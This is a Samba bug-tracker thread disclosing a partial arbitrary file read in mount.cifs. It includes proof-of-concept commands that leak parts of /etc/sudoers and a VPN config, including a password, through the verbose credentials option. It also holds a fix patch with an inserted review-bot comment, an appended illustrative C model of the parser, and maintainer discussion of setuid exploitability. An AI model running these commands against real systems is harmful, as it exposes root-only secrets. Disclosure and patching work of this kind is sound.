* [Bug 15026] New: Partial arbitrary file read via mount.cifs
From: samba-bugs @ 2022-03-21 11:03 UTC
  To: cifs-qa

https://bugzilla.samba.org/show_bug.cgi?id=15026

            Bug ID: 15026
           Summary: Partial arbitrary file read via mount.cifs
           Product: CifsVFS
           Version: 5.x
          Hardware: All
                OS: All
            Status: NEW
          Severity: normal
          Priority: P5
         Component: user space tools
          Assignee: jlayton@samba.org
          Reporter: jbe@improsec.com
        QA Contact: cifs-qa@samba.org
                CC: sfrench@samba.org
  Target Milestone: ---

Partial arbitrary file read via mount.cifs

The following was tested on cifs-utils version 6.14.

The "credentials" option of the mount.cifs binary allows for partial arbitrary file
disclosure when the verbose flag is set. When a credential line is invalid, the
following code is reached:

 571 static int open_cred_file(char *file_name,
 572                         struct parsed_mount_info *parsed_info)
 573 {
 ...
 637                 case CRED_UNPARSEABLE:
 638                         if (parsed_info->verboseflag)
 639                                 fprintf(stderr, "Credential formatted "
 640                                         "incorrectly: %s\n",
 641                                         temp_val ? temp_val : "(null)");

Because of how credential files are formatted, any part of a line after an
equal sign in an invalid line is printed. Such lines can be found in sensitive
files:

secure_path and rights in /etc/sudoers:

$ ls -l /etc/sudoers
-r--r----- 1 root root 670 Apr 20  2021 /etc/sudoers

$ sudo /usr/sbin/mount.cifs -v //127.0.0.1/share /mnt/share -o credentials=/etc/sudoers
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly:
"/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (ALL:ALL) ALL
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (ALL:ALL) ALL
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Password for root@//127.0.0.1/share: 
mount.cifs kernel mount options:
ip=127.0.0.1,unc=\\127.0.0.1\share,user=root,pass=********
mount error(111): could not connect to 127.0.0.1Unable to find suitable address.

Passwords in /etc/openfortivpn/config:

$ ls -l /etc/openfortivpn/config
-rw------- 1 root root 154 Aug 28  2021 /etc/openfortivpn/config

$ sudo /usr/sbin/mount.cifs -v //127.0.0.1/share /mnt/share -o credentials=/etc/openfortivpn/config
Credential formatted incorrectly: (null)
Credential formatted incorrectly: (null)
Credential formatted incorrectly:  vpn.example.org
Credential formatted incorrectly:  443
Credential formatted incorrectly:  vpnuser
Credential formatted incorrectly:  VPNpassw0rd
Password for root@//127.0.0.1/share: 
mount.cifs kernel mount options:
ip=127.0.0.1,unc=\\127.0.0.1\share,user=root,pass=********
mount error(111): could not connect to 127.0.0.1Unable to find suitable address.

Note that either sudo rights on the mount.cifs binary or an entry in fstab are
needed to perform the read.

A possible mitigation is to get rid of the token value when printing the error
in verbose mode:

From: Jeffrey Bencteux <jbe@improsec.com>
Date: Sat, 19 Mar 2022 13:41:15 -0400
Subject: [PATCH] fix verbose message of credentials option

When a supposed credential line is invalid, the verbose message prints
part of it. This leads to information disclosure when the
credentials file given is sensitive and contains '=' signs.

Signed-off-by: Jeffrey Bencteux <jbe@improsec.com>
---
 mount.cifs.c | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/mount.cifs.c b/mount.cifs.c
index 32521a7..82358a3 100644
--- a/mount.cifs.c
+++ b/mount.cifs.c
@@ -637,8 +637,7 @@ static int open_cred_file(char *file_name,
                case CRED_UNPARSEABLE:
                        if (parsed_info->verboseflag)
                                fprintf(stderr, "Credential formatted "
-                                       "incorrectly: %s\n",
-                                       temp_val ? temp_val : "(null)");
+                                       "incorrectly\n");
                        break;
                }
        }
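Review bot: with the token dropped, the CRED_UNPARSEABLE message no longer tells the user which line of the credentials file was rejected, so a genuinely malformed file becomes harder to fix. Consider reporting the position rather than the content, for example by counting lines in the read loop and printing `"Credential formatted incorrectly (line %u)\n"`; that keeps the diagnostic useful while still never echoing data from a file the invoking user may not be permitted to read.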
-- 
2.33.0

-- 
You are receiving this mail because:
You are the QA Contact for the bug.
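The parse-and-report path described in the report, as an added example that is not part of the bug report or of cifs-utils: a simplified C model of the credentials parser (the key matching and the untrimmed value handling are assumptions, not the real parser) that renders the pre-patch verbose message beside the patched one for a constructed config line.

```c
/* Added example, not cifs-utils code: a simplified model of the mount.cifs
 * credentials parser, showing why the verbose CRED_UNPARSEABLE message leaked
 * file contents and what the patched message prints instead. Assumed: lines
 * are key=value, keys must equal username/password/domain, values untrimmed. */
#include <stdio.h>
#include <string.h>

enum cred { CRED_UNPARSEABLE = 0, CRED_USER, CRED_PASS, CRED_DOM };

/* Verbose messages rendered by check_line(), pre-patch and post-patch form. */
static char leaky_msg[256], fixed_msg[256];

/* Split "key=value" in place; *val points after '=' or is NULL without '='. */
static enum cred parse_cred_line(char *line, char **val)
{
    char *eq = strchr(line, '=');
    *val = NULL;
    if (!eq)
        return CRED_UNPARSEABLE;
    *eq = '\0';                          /* terminate the key */
    *val = eq + 1;
    (*val)[strcspn(*val, "\n")] = '\0';  /* drop the trailing newline */
    if (!strcmp(line, "username")) return CRED_USER;
    if (!strcmp(line, "password")) return CRED_PASS;
    if (!strcmp(line, "domain"))   return CRED_DOM;
    return CRED_UNPARSEABLE;
}

/* Parse a copy of one file line (constructed input, not a real file). When the
 * line is rejected, render the verbose message both ways: the pre-patch form
 * echoes whatever follows '=' on that line, which is the disclosure reported
 * above; the patched form reports the rejection without the token. */
static enum cred check_line(const char *input)
{
    char line[256], *val;
    enum cred kind;
    snprintf(line, sizeof line, "%s", input);
    kind = parse_cred_line(line, &val);
    leaky_msg[0] = fixed_msg[0] = '\0';
    if (kind == CRED_UNPARSEABLE) {
        snprintf(leaky_msg, sizeof leaky_msg,
                 "Credential formatted incorrectly: %s", val ? val : "(null)");
        snprintf(fixed_msg, sizeof fixed_msg, "Credential formatted incorrectly");
    }
    return kind;
}
```

Feeding a line such as `password = VPNpassw0rd` (a VPN config line, not a credential in the expected format) yields a rejected line whose value is echoed in `leaky_msg` but absent from `fixed_msg`.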


* [Bug 15026] Partial arbitrary file read via mount.cifs
From: samba-bugs @ 2022-03-21 12:13 UTC
  To: cifs-qa

https://bugzilla.samba.org/show_bug.cgi?id=15026

David Disseldorp <ddiss@samba.org> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
              Group|                            |samba-devel


* [Bug 15026] Partial arbitrary file read via mount.cifs
From: samba-bugs @ 2022-03-21 12:42 UTC
  To: cifs-qa

https://bugzilla.samba.org/show_bug.cgi?id=15026

David Disseldorp <ddiss@samba.org> changed:

           What    |Removed                     |Added
----------------------------------------------------------------------------
      Comment #1 is|1                           |0
            private|                            |


* [Bug 15026] Partial arbitrary file read via mount.cifs
From: samba-bugs @ 2022-03-21 13:49 UTC
  To: cifs-qa

https://bugzilla.samba.org/show_bug.cgi?id=15026

--- Comment #2 from Jeffrey Bencteux <jbe@improsec.com> ---
(In reply to David Disseldorp from comment #1)

> Please correct me if I'm wrong, but I don't expect that this would be exploitable
> on regular systems unless mount.cifs is installed with setuid-root, or an attacker
> somehow has access to the "credentails" path fed into a mount.cifs invocation.

That is partially correct; note that on a vanilla Debian 10, mount.cifs is
setuid-root by default:

$ ls -l /usr/sbin/mount.cifs 
-rwsr-xr-x 1 root root 35600 Jun 17  2018 /usr/sbin/mount.cifs

And likely it is the case on other distributions as otherwise the following
message is returned:

$ ./mount.cifs //127.0.0.1/share /mnt/share -v -o credentials=/etc/sudoers
This program is not installed setuid root -  "user" CIFS mounts not supported.

It however seems needed to either:

1) have privileged user rights to trigger the bug, such as the below line in
/etc/sudoers:

testuser ALL=NOPASSWD: /usr/sbin/mount.cifs

Which is less likely but possible.

2) Have the scenario you depict where a user can tamper with a mount with a rogue
"credentials" option value.

This greatly reduces the risk IMO.

I think the explanation is in these lines of mount.cifs.c:

 115  * When an unprivileged user runs a setuid mount.cifs, we set certain mount
 116  * flags by default. These defaults can be changed here.
 117  */
 118 #define CIFS_SETUID_FLAGS (MS_NOSUID|MS_NODEV)

I expect some people to use rules such as the above sudo one to circumvent the
problem.


* [Bug 15026] Partial arbitrary file read via mount.cifs
From: samba-bugs @ 2022-03-21 16:36 UTC
  To: cifs-qa

https://bugzilla.samba.org/show_bug.cgi?id=15026

--- Comment #3 from David Disseldorp <ddiss@samba.org> ---
(In reply to Jeffrey Bencteux from comment #2)
> (In reply to David Disseldorp from comment #1)
> 
> > Please correct me if I'm wrong, but I don't expect that this would be exploitable
> > on regular systems unless mount.cifs is installed with setuid-root, or an attacker
> > somehow has access to the "credentails" path fed into a mount.cifs invocation.
> 
> That is partially correct, note that on a vanilla Debian 10, mount.cifs is
> setuid-root by default:
> 
> $ ls -l /usr/sbin/mount.cifs 
> -rwsr-xr-x 1 root root 35600 Jun 17  2018 /usr/sbin/mount.cifs

Ouch. I assume Ubuntu inherits this default setting.

> And likely it is the case on other distributions as otherwise the following
> message is returned:
> 
> $ ./mount.cifs //127.0.0.1/share /mnt/share -v -o credentials=/etc/sudoers
> This program is not installed setuid root -  "user" CIFS mounts not
> supported.
> 
> It however seems needed to either:
> 
> 1) have privileged user rights to trigger the bug, such as the below line in
> /etc/sudoers:
> 
> testuser ALL=NOPASSWD: /usr/sbin/mount.cifs
> 
> Which is less likely but possible.
> 
> 2) Have the scenario you depict where a user can tamper a mount with a rogue
> "credentials" option value.
> 
> This greatly reduce the risk IMO.
> 
> I think the explanation is in these lines of mount.cifs.c:
> 
>  115  * When an unprivileged user runs a setuid mount.cifs, we set certain
> mount
>  116  * flags by default. These defaults can be changed here.
>  117  */
>  118 #define CIFS_SETUID_FLAGS (MS_NOSUID|MS_NODEV)
> 
> I expect some people to use rules such as the above sudo one to circumvent
> the problem.

I don't completely follow - so for the setuid-root case, can root-readable
files be dumped by regular users (ignoring apparmor/selinux) using
credentials=<root-only-path>, or do the dropped privileges mean that a
different approach (sudo) is needed?
